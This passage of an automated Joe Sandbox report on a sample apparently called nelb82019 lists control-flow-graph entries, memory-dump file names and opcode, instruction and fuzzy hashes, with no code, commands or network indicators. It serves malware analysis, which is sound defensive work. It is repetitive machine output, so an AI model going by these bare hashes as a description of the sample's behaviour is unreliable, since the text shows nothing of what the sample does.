• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
• Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
• Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
• Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Control-flow Graph 6: 91fc60-91fc75 LdrInitializeThunk [graph image not reproduced]
APIs
Memory Dump Source
• Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
• Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
• Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
• Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Control-flow Graph 8: 91fd8c-91fda4 LdrInitializeThunk [graph image not reproduced]
APIs
Memory Dump Source
• Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
• Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
• Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
• Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Control-flow Graph 9: 91fdc0-91fdd5 LdrInitializeThunk [graph image not reproduced]
APIs
Memory Dump Source
• Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
• Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
• Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
• Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Control-flow Graph 10: 91fea0-91feb5 LdrInitializeThunk [graph image not reproduced]
APIs
Memory Dump Source
• Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
• Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
• Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
• Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Control-flow Graph 11: 91fed0-91fee5 LdrInitializeThunk [graph image not reproduced]
APIs
Memory Dump Source
• Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
• Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
• Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
• Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 12 91ffb4-91ffc9 LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: h
                                                                                • API String ID: 0-2439710439
                                                                                • Opcode ID: 8028b2b1eed58ae408a2a2206ba74fd4f24490b7df0310c84f5d6ea04bc6b6d7
                                                                                • Instruction ID: b09c97ad92f38dd907b94f94b40e9d9251748665e79d3d514d3e5dba3ff6f6ee
                                                                                • Opcode Fuzzy Hash: 8028b2b1eed58ae408a2a2206ba74fd4f24490b7df0310c84f5d6ea04bc6b6d7
                                                                                • Instruction Fuzzy Hash: 7951E571A00209ABDB24DF65DC81AEFB7F9EF49304F00455EE80597741EB34EA4587E9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (
                                                                                • API String ID: 0-3887548279
                                                                                • Opcode ID: c0628fd986619627b6302748f753d5ad595e4d04418077e8cefceef9e2bba27f
                                                                                • Instruction ID: 39120f31cb994185fa0c0c6b21bf0f3a25baef4909208558378fadfbf7b8d04a
                                                                                • Opcode Fuzzy Hash: c0628fd986619627b6302748f753d5ad595e4d04418077e8cefceef9e2bba27f
                                                                                • Instruction Fuzzy Hash: 42215170600105ABCB18CF5ADC80DAB77AAEFC4714714C19AE8098B706E738ED91CBE4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: eee836db98457e1a1fc15c982b245ce79de38a4e21484a3cfdb16524bc8b6edd
                                                                                • Instruction ID: 60665edb089a4da5b7c7183c523ff1e9e65292fa4df177ff76d86402c6307b05
                                                                                • Opcode Fuzzy Hash: eee836db98457e1a1fc15c982b245ce79de38a4e21484a3cfdb16524bc8b6edd
                                                                                • Instruction Fuzzy Hash: 21110A716442087BE220DAA6DC82FEB73DCDF49704F00055EF918CB281E7A5BE9543E9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c98e3c9178eb47e451a137275a6f671eea8e511da12b2085ec6db11e32527697
                                                                                • Instruction ID: 009ab7c3280bec392b6566a58d73300905074bd05481c1749b44bc7888af9573
                                                                                • Opcode Fuzzy Hash: c98e3c9178eb47e451a137275a6f671eea8e511da12b2085ec6db11e32527697
                                                                                • Instruction Fuzzy Hash: 3201883674111437C620555ADC09FDBAB59CFC1B64F19012AFE0CDB341E3689D9286E9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6ffca3f4a79742ed63945bcfd2ff7396b609a1e81aac850e4fd37097c3dab7f6
                                                                                • Instruction ID: 7a4104d9939bcb4b597ff493a1a2799e53c5cb17d71d9ac4b0ab84d4e6aeca4c
                                                                                • Opcode Fuzzy Hash: 6ffca3f4a79742ed63945bcfd2ff7396b609a1e81aac850e4fd37097c3dab7f6
                                                                                • Instruction Fuzzy Hash: EB01627290030C66DB14EBA1CC82FEF773D9B44704F00459EB7496B0C2E679A698CBE5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 536bfb5c9fe8166ac54ec5bd66093c399c6d8ef141dad6f9109ffea512c8d65d
                                                                                • Instruction ID: 060a2e8ee848f258523e02934bf7b4969daa03c852217821cb3e46b96727d729
                                                                                • Opcode Fuzzy Hash: 536bfb5c9fe8166ac54ec5bd66093c399c6d8ef141dad6f9109ffea512c8d65d
                                                                                • Instruction Fuzzy Hash: 36E09B716842097AF71099AA9D82FE7639CDB49315F00005AFA08EB2C1D6B95D9143F9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 38c6c326ce4ad33f05e29f6f7788b92ff59919cab33535bedbac99f45c558931
                                                                                • Instruction ID: d1fd070bbf88014ce5866d8e9a2340663cc67632aee183b35952e701bc64936e
                                                                                • Opcode Fuzzy Hash: 38c6c326ce4ad33f05e29f6f7788b92ff59919cab33535bedbac99f45c558931
                                                                                • Instruction Fuzzy Hash: D9E0EDB661430EAF9B04CE69EC42DAB37ACEB58254B04451AFC09C3200F630F9208BA1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 464f7d1c597164a6d5357f671cdf5d26846a914594145784788906905fc075af
                                                                                • Instruction ID: f80eb62960a15a7d5f41cf81be893b47fb45bed63b3c1afc34f5a7c090dbc8ec
                                                                                • Opcode Fuzzy Hash: 464f7d1c597164a6d5357f671cdf5d26846a914594145784788906905fc075af
                                                                                • Instruction Fuzzy Hash: 51E0863670121437C624659ADC06FD7B75CCBC5F60F09002AFE0CDB341E6A8AD5186E9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c40b263e171f7afe17e06ae10761000326582230c5089b313f59c0bdbc66b179
                                                                                • Instruction ID: 3d58cd350d075d132c88aa557a1f3abf0778a86d447348b6511e6b39d7f70c69
                                                                                • Opcode Fuzzy Hash: c40b263e171f7afe17e06ae10761000326582230c5089b313f59c0bdbc66b179
                                                                                • Instruction Fuzzy Hash: 08F0AC75510209AFDB04CF59C881EDB73A9EB88750F04C519FD19CB641E774EA10CBA1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d6657ac5bc3004f505b1b1dbf5b142111d5f788b7fdca47ba48cffe40e00d809
                                                                                • Instruction ID: 595b478891ae7886c80280d34563c59e0c071687cb159ecff06bf4317a5bb1f4
                                                                                • Opcode Fuzzy Hash: d6657ac5bc3004f505b1b1dbf5b142111d5f788b7fdca47ba48cffe40e00d809
                                                                                • Instruction Fuzzy Hash: FEE09B719103085AF764F774DD4BFD9737C9B04308F4007D9BA0CA61C2FB7956554A95
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7ff3bc997b7e8420044eb2aae527a3d3b88b8387f7e416a5616c9eb0b9c8c3e0
                                                                                • Instruction ID: 4317296fd11b088f71e2f314a2f93ad5a54475706daa7c2690f57de3ebcf6d3a
                                                                                • Opcode Fuzzy Hash: 7ff3bc997b7e8420044eb2aae527a3d3b88b8387f7e416a5616c9eb0b9c8c3e0
                                                                                • Instruction Fuzzy Hash: C7C080755003087FD700DF8CDC46F5533DC9708614F054044B90C8B342D570FD508755
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410844870.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410844870.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410844870.000000000041B000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ce289c407a8a919e9cbd3984d4173a8f7626d755ebd6694e2d49b2df59896648
                                                                                • Instruction ID: f968251e49c839e4cb1a6ecd046f32c58005516b4dbc214b92541711b8784665
                                                                                • Opcode Fuzzy Hash: ce289c407a8a919e9cbd3984d4173a8f7626d755ebd6694e2d49b2df59896648
                                                                                • Instruction Fuzzy Hash: B3A022B0C8830E03002030FA2A03023BB0CC000008F0003EBAE8C022023C02A83200EB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: [Pj
                                                                                • API String ID: 0-2289356113
                                                                                • Opcode ID: dd117009e40305c4442b519255e1793c5efb1778969ab00286dd97076fc83a86
                                                                                • Instruction ID: a825bed8d58ae5fd6d8e1457751c9c2365e6b274cc5fed22bdf80c6bc434090c
                                                                                • Opcode Fuzzy Hash: dd117009e40305c4442b519255e1793c5efb1778969ab00286dd97076fc83a86
                                                                                • Instruction Fuzzy Hash: 3EF06231304208ABD7119A10CD85F6A7BA9AFD9754F14C858F4455A093C7B78891D721
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                • Instruction ID: 255d2f1df3508891b1da3aa24b2bf372da9c970738ce58bea6260cca6cfd0b0b
                                                                                • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                • Instruction Fuzzy Hash: 90F0C231328159EBDB48EB189D5576A73D9FB94300F54C439ED4ACB245E635FD408A90
Memory Dump Source
• Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
• Instruction ID: 5ec72997bb8b38b283ccabd5a8efba5f0627eb645be48a31d6e7ad6c15548e09
• Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
• Instruction Fuzzy Hash: 25F05E73244205DFCB1CCF04C490BB977A6AB80719F64842CE50F8F690D7399841CA54
Memory Dump Source
• Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 45f6d949e6308e5806db510394ccd72a8706a5e01a595241f34b885e0c248d16
• Instruction ID: ba0a9ec0da72aaad685f69c7641cca5720aecefcc075adabd334f1bba27b6042
• Opcode Fuzzy Hash: 45f6d949e6308e5806db510394ccd72a8706a5e01a595241f34b885e0c248d16
• Instruction Fuzzy Hash: 93E09A71648B84CBC320DF14C901B5AB3E4FFC8B10F10483AF40A87750D7B89A44C952
Memory Dump Source
• Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
• Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
• Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
